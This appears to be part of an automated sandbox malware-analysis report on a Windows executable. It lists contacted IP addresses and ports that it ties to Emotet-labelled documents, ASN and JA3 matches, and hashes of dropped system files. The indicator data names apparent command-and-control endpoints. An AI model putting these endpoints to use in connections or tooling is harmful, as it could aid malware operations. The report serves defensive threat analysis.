                                                                                                                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, cs9.wac.phicdn.net, settingsfd-prod-wus21-endpoint.trafficmanager.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, vip1-par02p.wns.notify.trafficmanager.net, wns.notify.trafficmanager.net, ocsp.digicert.com, login.live.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, www.tm.a.prd.aadg.akadns.net, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, ams2.current.a.prd.aadg.trafficmanager.net
                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                TimeTypeDescription
                                                                                                                                                19:28:54API Interceptor6x Sleep call for process: svchost.exe modified
                                                                                                                                                19:30:09API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                178.62.39.238Dokumente #9679310812.docGet hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                Invoices Overdue.docGet hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                Invoices Overdue.docGet hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                Dokumente vom Notar #33062192.docGet hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                Dokumente vom Notar #33062192.docGet hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                Emotet21.02.docGet hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                Emotet21.02.docGet hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                Emotet.docGet hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                Emotet.docGet hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                Document needed.docGet hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                Document needed.docGet hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                Question.docGet hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                Question.docGet hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                http://ardri-lubrication.com/Question/Get hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                newemotet.docGet hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                newemotet.docGet hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                http://ardri-lubrication.com/Question/Get hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                Rechnung49915.docGet hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                Rechnung49915.docGet hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                Emotet20.02.18A.docGet hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                80.86.91.232Invoice.docGet hashmaliciousBrowse
                                                                                                                                                • 80.86.91.232:4143/
                                                                                                                                                Overdue payment.docGet hashmaliciousBrowse
                                                                                                                                                • 80.86.91.232:4143/
                                                                                                                                                Emotet.docGet hashmaliciousBrowse
                                                                                                                                                • 80.86.91.232:4143/
                                                                                                                                                Outstanding Invoices.docGet hashmaliciousBrowse
                                                                                                                                                • 80.86.91.232:4143/
                                                                                                                                                Outstanding Invoices.docGet hashmaliciousBrowse
                                                                                                                                                • 80.86.91.232:4143/
                                                                                                                                                Emote.exeGet hashmaliciousBrowse
                                                                                                                                                • 80.86.91.232:4143/
                                                                                                                                                Question.docGet hashmaliciousBrowse
                                                                                                                                                • 80.86.91.232:4143/
                                                                                                                                                emotet.docGet hashmaliciousBrowse
                                                                                                                                                • 80.86.91.232:4143/
                                                                                                                                                Paypal.docGet hashmaliciousBrowse
                                                                                                                                                • 80.86.91.232:4143/
                                                                                                                                                Paypal.docGet hashmaliciousBrowse
                                                                                                                                                • 80.86.91.232:4143/
                                                                                                                                                emotet.docGet hashmaliciousBrowse
                                                                                                                                                • 80.86.91.232:4143/
                                                                                                                                                emotet.docGet hashmaliciousBrowse
                                                                                                                                                • 80.86.91.232:4143/
                                                                                                                                                960-27-621120-257 & 960-27-621120-969.docGet hashmaliciousBrowse
                                                                                                                                                • 80.86.91.232:4143/
                                                                                                                                                Rechnung.docGet hashmaliciousBrowse
                                                                                                                                                • 80.86.91.232:4143/
                                                                                                                                                Open invoices.docGet hashmaliciousBrowse
                                                                                                                                                • 80.86.91.232:4143/
                                                                                                                                                20180212-20_46_01_.docGet hashmaliciousBrowse
                                                                                                                                                • 80.86.91.232:7080/
                                                                                                                                                SalesInvoice.docGet hashmaliciousBrowse
                                                                                                                                                • 80.86.91.232:7080/
                                                                                                                                                SalesInvoice.docGet hashmaliciousBrowse
                                                                                                                                                • 80.86.91.232:7080/
                                                                                                                                                mj03dyvx_2076767.exeGet hashmaliciousBrowse
                                                                                                                                                • 80.86.91.232:7080/
                                                                                                                                                Scan1782384.docGet hashmaliciousBrowse
                                                                                                                                                • 80.86.91.232:7080/

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASN

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                GD-EMEA-DC-SXB1DETaTYytHaBk.exeGet hashmaliciousBrowse
                                                                                                                                                • 85.25.43.31
                                                                                                                                                8X93Tzvd7V.exeGet hashmaliciousBrowse
                                                                                                                                                • 217.172.179.54
                                                                                                                                                u8A8Qy5S7O.exeGet hashmaliciousBrowse
                                                                                                                                                • 217.172.179.54
                                                                                                                                                SecuriteInfo.com.Mal.GandCrypt-A.24654.exeGet hashmaliciousBrowse
                                                                                                                                                • 217.172.179.54
                                                                                                                                                SecuriteInfo.com.Mal.GandCrypt-A.5674.exeGet hashmaliciousBrowse
                                                                                                                                                • 217.172.179.54
                                                                                                                                                csrss.bin.exeGet hashmaliciousBrowse
                                                                                                                                                • 188.138.33.233
                                                                                                                                                yx8DBT3r5r.exeGet hashmaliciousBrowse
                                                                                                                                                • 92.51.129.66
                                                                                                                                                E00636067E.exeGet hashmaliciousBrowse
                                                                                                                                                • 85.25.177.199
                                                                                                                                                http___contributeindustry.com_js_engine-rawbin.exeGet hashmaliciousBrowse
                                                                                                                                                • 85.25.177.199
                                                                                                                                                z2xQEFs54b.exeGet hashmaliciousBrowse
                                                                                                                                                • 87.230.93.218
                                                                                                                                                M9j9PKzG99.dllGet hashmaliciousBrowse
                                                                                                                                                • 62.75.168.152
                                                                                                                                                u9q6OemjX5.dllGet hashmaliciousBrowse
                                                                                                                                                • 62.75.168.152
                                                                                                                                                Iy5GlyAujZ.dllGet hashmaliciousBrowse
                                                                                                                                                • 62.75.168.152
                                                                                                                                                DPLhVm07M0.dllGet hashmaliciousBrowse
                                                                                                                                                • 62.75.168.152
                                                                                                                                                KMD9GwwC1a.dllGet hashmaliciousBrowse
                                                                                                                                                • 62.75.168.152
                                                                                                                                                T6c9JZgNiz.dllGet hashmaliciousBrowse
                                                                                                                                                • 62.75.168.152
                                                                                                                                                HHCCEzq4Kv.dllGet hashmaliciousBrowse
                                                                                                                                                • 62.75.168.152
                                                                                                                                                W8bfp4WrpK.dllGet hashmaliciousBrowse
                                                                                                                                                • 62.75.168.152
                                                                                                                                                C3kvRroXyY.dllGet hashmaliciousBrowse
                                                                                                                                                • 62.75.168.152
                                                                                                                                                hOpCAW8ZmJ.dllGet hashmaliciousBrowse
                                                                                                                                                • 62.75.168.152
                                                                                                                                                DIGITALOCEAN-ASNUSSecuriteInfo.com.Variant.Bulz.385171.11582.exeGet hashmaliciousBrowse
                                                                                                                                                • 138.197.53.157
                                                                                                                                                SecuriteInfo.com.Adware.WizzMonetize.1.3832.exeGet hashmaliciousBrowse
                                                                                                                                                • 138.197.53.157
                                                                                                                                                987ecd3efd6f143e1e63bf3cff337224d2131be4a21a6.exeGet hashmaliciousBrowse
                                                                                                                                                • 206.189.90.152
                                                                                                                                                4FNTlzlu10.exeGet hashmaliciousBrowse
                                                                                                                                                • 5.101.110.225
                                                                                                                                                SecuriteInfo.com.Trojan.Siggen12.58144.411.exeGet hashmaliciousBrowse
                                                                                                                                                • 5.101.110.225
                                                                                                                                                7Q1bVVkIIL.exeGet hashmaliciousBrowse
                                                                                                                                                • 5.101.110.225
                                                                                                                                                ps_script.ps1Get hashmaliciousBrowse
                                                                                                                                                • 159.65.89.222
                                                                                                                                                csrss.bin.exeGet hashmaliciousBrowse
                                                                                                                                                • 46.101.183.160
                                                                                                                                                R2o3eEx5Zj.exeGet hashmaliciousBrowse
                                                                                                                                                • 5.101.110.225
                                                                                                                                                document-1767706363.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 159.203.6.250
                                                                                                                                                Kiod.dllGet hashmaliciousBrowse
                                                                                                                                                • 178.128.243.14
                                                                                                                                                aEdlObiYav.exeGet hashmaliciousBrowse
                                                                                                                                                • 104.236.246.93
                                                                                                                                                ajESKcIz8f.exeGet hashmaliciousBrowse
                                                                                                                                                • 138.197.53.157
                                                                                                                                                Revised Signed Proforma Invoice 000856453553.exeGet hashmaliciousBrowse
                                                                                                                                                • 134.209.159.22
                                                                                                                                                rona.exeGet hashmaliciousBrowse
                                                                                                                                                • 104.248.117.19
                                                                                                                                                fDFkIEBfpm.exeGet hashmaliciousBrowse
                                                                                                                                                • 206.189.174.29
                                                                                                                                                JE74.vbsGet hashmaliciousBrowse
                                                                                                                                                • 104.248.193.149
                                                                                                                                                4d86320858effdc2c8bf3fc2ae86080f0f6b449141991.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.172.240.248
                                                                                                                                                Rc93GKN1MJ.exeGet hashmaliciousBrowse
                                                                                                                                                • 138.197.161.207
                                                                                                                                                tBU1h89Elf.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.172.240.248
                                                                                                                                                LINODE-APLinodeLLCUSTaTYytHaBk.exeGet hashmaliciousBrowse
                                                                                                                                                • 45.33.51.71
                                                                                                                                                0HvIGwMmBV.exeGet hashmaliciousBrowse
                                                                                                                                                • 173.230.145.224
                                                                                                                                                pitEBNziGR.exeGet hashmaliciousBrowse
                                                                                                                                                • 173.230.145.224
                                                                                                                                                aEdlObiYav.exeGet hashmaliciousBrowse
                                                                                                                                                • 45.33.54.74
                                                                                                                                                1m7388e48E.exeGet hashmaliciousBrowse
                                                                                                                                                • 45.79.26.231
                                                                                                                                                4849708PO # RMS0001.exeGet hashmaliciousBrowse
                                                                                                                                                • 45.79.19.196
                                                                                                                                                SecuriteInfo.com.Trojan.Kronos.21.31435.exeGet hashmaliciousBrowse
                                                                                                                                                • 139.162.210.252
                                                                                                                                                Z8bln2YPEw.exeGet hashmaliciousBrowse
                                                                                                                                                • 96.126.101.20
                                                                                                                                                yxQWzvifFe.exeGet hashmaliciousBrowse
                                                                                                                                                • 96.126.123.244
                                                                                                                                                Purchase _Order-EndUer#99849959.Pdff.exeGet hashmaliciousBrowse
                                                                                                                                                • 139.162.21.249
                                                                                                                                                Private document.docmGet hashmaliciousBrowse
                                                                                                                                                • 139.162.187.154
                                                                                                                                                p.o_015299.exeGet hashmaliciousBrowse
                                                                                                                                                • 104.237.142.196
                                                                                                                                                p.o_015299.exeGet hashmaliciousBrowse
                                                                                                                                                • 104.237.142.196
                                                                                                                                                2ojdmC51As.exeGet hashmaliciousBrowse
                                                                                                                                                • 172.104.97.173
                                                                                                                                                po#521.exeGet hashmaliciousBrowse
                                                                                                                                                • 104.237.142.196
                                                                                                                                                GBv66BGS05.exeGet hashmaliciousBrowse
                                                                                                                                                • 45.79.222.138
                                                                                                                                                unpacked.exeGet hashmaliciousBrowse
                                                                                                                                                • 172.104.179.220
                                                                                                                                                E-CONTACT_FORM.htmlGet hashmaliciousBrowse
                                                                                                                                                • 74.207.250.131
                                                                                                                                                page.exeGet hashmaliciousBrowse
                                                                                                                                                • 172.104.225.210
                                                                                                                                                page.exeGet hashmaliciousBrowse
                                                                                                                                                • 172.104.225.210

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                51c64c77e60f3980eea90869b68c58a8cEZGHOTI9M.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                cEZGHOTI9M.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                VRREYtOlaw.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                VRREYtOlaw.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                9BctgN1cuV.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                9BctgN1cuV.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                ENSZQNEEuN.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                ENSZQNEEuN.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                BGvrz0jcwz.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                BGvrz0jcwz.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                WN6Lq0spUU.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                WN6Lq0spUU.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                tWeWr7k3cy.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                tWeWr7k3cy.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                0ZvReoyBhP.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                0ZvReoyBhP.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                3A4jLXA7Ur.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                3A4jLXA7Ur.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                q61RDjJwNE.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                q61RDjJwNE.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\edb.chk
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):24576
                                                                                                                                                Entropy (8bit):0.36205444996716485
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:UtcctcMtcctcMtcctcMtcctcQtcctc0tcctc:UtTtDtTtDtTtDtTtTtTtbtTt
                                                                                                                                                MD5:353C0E84A6C573D30B15481706263B9A
                                                                                                                                                SHA1:4DCBF5ED97F1251EEF6E0747906368AB5639D0FA
                                                                                                                                                SHA-256:4412C6044B8C975D5BAB1F0E173339AE2A091A3B4D2DFBF771F1E9B854EF1751
                                                                                                                                                SHA-512:210B6E533923CF5F3FE255C39E1B2D243F675D2C022FA613E3ABD680FB552A2FD9079BF1699C91A5033AED47E29EE0191CF6E307429554A3128D2C009E047AFD
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: .............'..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................).............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):16384
                                                                                                                                                Entropy (8bit):0.24097992741802837
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:0iGaD0JcaaD0JwQQSAg/0bjSQJkTXVPV15VPV1:0ugJctgJwPrjSukT7D
                                                                                                                                                MD5:E685F3F1F4748BE770F382EAB21642AA
                                                                                                                                                SHA1:45BD6CFC60352A3A72A28D0DD8958A518356CE1D
                                                                                                                                                SHA-256:A2EA73F08386C4C35B63FC06D636BC53D8D494E25EB036791F3E78ED2C827E44
                                                                                                                                                SHA-512:B268B5C822127A71B4F60EE850E99C348A7C4A933454E458C0106A7924C25E55BCD2BBF35F271681B05427B1956DAFC2204F347F89E9B5F60382D3768323DFB7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: ......:{..(.....6....y).............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................6....y)...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x364932a2, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):131072
                                                                                                                                                Entropy (8bit):0.09734258485403852
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:z0+9O4blLeK10+9O4blLeKBI0+9O4blxXseKBI0+9O4blxXseKl9G0+9O4blZXs1:IvUk6kWxIGxIFn
                                                                                                                                                MD5:D790E163439238FFDA1622E1D2F93BCB
                                                                                                                                                SHA1:F84769BF5818F7C839D2DD2E1BEDFC0B598D3577
                                                                                                                                                SHA-256:70A5D08C046DE0C7A36E8EFB5ACC5EA614996C08DBB2868BEF8FF818979BA3EE
                                                                                                                                                SHA-512:0EBF60CF15259FECD40FD3A3CCCD808A66A0D4AE80B3116DF5018BB14F27E898A62346CA9E22441A35FC3FEB87CFF2C47C0AF19E38C6418572A871EE3FC0B9B9
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: 6I2.... ................e.f.3...w........................&..........w..6....y).h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................p..a6....y)k................h..`6....y).........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):32768
                                                                                                                                                Entropy (8bit):0.11610120210156388
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:9Yci8t4/aXXlici80gCX5AaJici8t5lXF6mdAVm1JrRJxlXzA:9DJt4/GXlVJdCXRVJtXXF6m0mfX
                                                                                                                                                MD5:1A68F60E8E60992962A09BFFDCD366F8
                                                                                                                                                SHA1:0FDFB6974363191995F8426E33E2114582FA53B7
                                                                                                                                                SHA-256:8263FBE2DCF6314BC4483E250492EBFB7C87905E5BD35A7A5E1902CCE49321A2
                                                                                                                                                SHA-512:3748CEC8ABDB2A41C9A4BC557BF1FB692922C9F4A650D2EB824B5486AFBBA5667BF8DE618DB5772AB94CB33883F0FD5A4ED61D199BEEDA2ABBC23EE17E488AAF
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: N.......................................3...w..6....y)......w...............w.......w....:O.....w..................h..`6....y).........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):55
                                                                                                                                                Entropy (8bit):4.306461250274409
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                                                                Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):906
                                                                                                                                                Entropy (8bit):3.145512419544203
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:58KRBubdpkoF1AG3rZvTk9+MlWlLehB4yAq7ejC4v+:OaqdmuF3rq+kWReH4yJ7Ms
                                                                                                                                                MD5:F3C639B4A0934C30F7C0F48DCF565F1D
                                                                                                                                                SHA1:C1F38DE44C0466DFE983EFD5FE49F9B06188F8BC
                                                                                                                                                SHA-256:7C1EA10956B819F7F7C52BB7E4AF95918E86D00C842FCD0A58B4EEDF4449EBAA
                                                                                                                                                SHA-512:CD4FB1A18D2ECADDBBB62815DEBCEC277773317CB3E97ECD90304BF2C1B6D0A82615FEF5FA6160FCF335E8E4CB42607A473A55DFE9C128FC16817FD31919B55D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: ........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. S.u.n. .. M.a.r. .. 2.8. .. 2.0.2.1. .1.9.:.3.0.:.0.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. S.u.n. .. M.a.r. .. 2.8. .. 2.0.2.1. .1.9.:.3.0.:.0.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
                                                                                                                                                C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CCFEED7EF3CD3BBD21329435542A98D2_9C2DDAC79C917837883918D6BB58BE90
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):471
                                                                                                                                                Entropy (8bit):7.2157743595441834
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:JG5UglqmzwOXLeS24UZjmwn8kEUGyMQ+IW:JGXbzjXaS2h0sNiBIW
                                                                                                                                                MD5:117E696DDA2887D0CF3D371C0F0F5CDB
                                                                                                                                                SHA1:3287572A71E3F9AB1A726135CD6D9547171D587D
                                                                                                                                                SHA-256:040D1EBE3056B0A05637DED2272913180A065F16C487C9038533DDDF3959BCD8
                                                                                                                                                SHA-512:D8BB16A987F95D55560BC8636C3C06FB767487C7BADD33E7C58975BE1473C81C84AE90682C2F4E6CEE06557244B21AA889A801A5AEBF26821A9836F9926013AC
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: 0..........0.....+.....0......0...0........a..1a./(.F8.,......20210327173302Z0s0q0I0...+........._.z....'.5..C.........a..1a./(.F8.,.......m..a.)0.3..]r....20210327173302Z....20210403164802Z0...*.H................X5$.{A9...#tFB}...,sg...r.mWe.....-.`.J!.....9...*T...w..vh...L.hm2.c.:....59.B.@Ds"P7..=..Y!.i...G>..E5).._)N)... ....}j...6tgmu.K......]...vc.u.....MC.......7.1.H.....35.{z..D....R...}>(....K.m.jA....y^l.P....Y,u.!.E.;8B^ssi......O..d`ms
                                                                                                                                                C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CCFEED7EF3CD3BBD21329435542A98D2_9C2DDAC79C917837883918D6BB58BE90
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):852
                                                                                                                                                Entropy (8bit):3.781409429240517
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:+29smxxvPbJ/GJsRmh0H9smxxvPbJ/GJsRf:FaQCoHaQCof
                                                                                                                                                MD5:5E325F7AD3A4E5DD97AF07B0E556E7AC
                                                                                                                                                SHA1:CCB4FC7DB8177DE4206B6606C2D46A2A18C69B6B
                                                                                                                                                SHA-256:B25C7CB8409E684756BADC0E64B12A1087A6355F06A8CC93090776D675571A8E
                                                                                                                                                SHA-512:1FA5514EF75FE357E3FC08532A95FFFD990CFBF8999ECB769BC32F0FC3DE36F501718B92454E35F1643336CE440212FCD5C92DA590EDE225E0231FDE7E2084E9
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: p...... ........8...C$..(....................................................... ........[.</#..sX..................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.Q.X.6.Z.6.g.A.i.d.t.S.e.f.N.c.6.D.C.0.O.I.n.q.P.H.D.Q.Q.U.D.4.B.h.H.I.I.x.Y.d.U.v.K.O.e.N.R.j.i.0.L.O.H.G.2.e.I.C.E.A.h.t.5.a.O.I.r.W.G.A.K.T.C.h.M.x.L.x.X.X.I.%.3.D...".6.0.5.f.6.c.4.e.-.1.d.7."...p...... ........8...C$..(................[.</#...MK..(...................MK..(.. ........[.</#..sX..................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.Q.X.6.Z.6.g.A.i.d.t.S.e.f.N.c.6.D.C.0.O.I.n.q.P.H.D.Q.Q.U.D.4.B.h.H.I.I.x.Y.d.U.v.K.O.e.N.R.j.i.0.L.O.H.G.2.e.I.C.E.A.h.t.5.a.O.I.r.W.G.A.K.T.C.h.M.x.L.x.X.X.I.%.3.D...".6.0.5.f.6.c.4.e.-.1.d.7."...

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Entropy (8bit):6.436116781781946
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                File name:yxghUyIGb4.exe
                                                                                                                                                File size:45568
                                                                                                                                                MD5:ecbc4b40dcfec4ed1b2647b217da0441
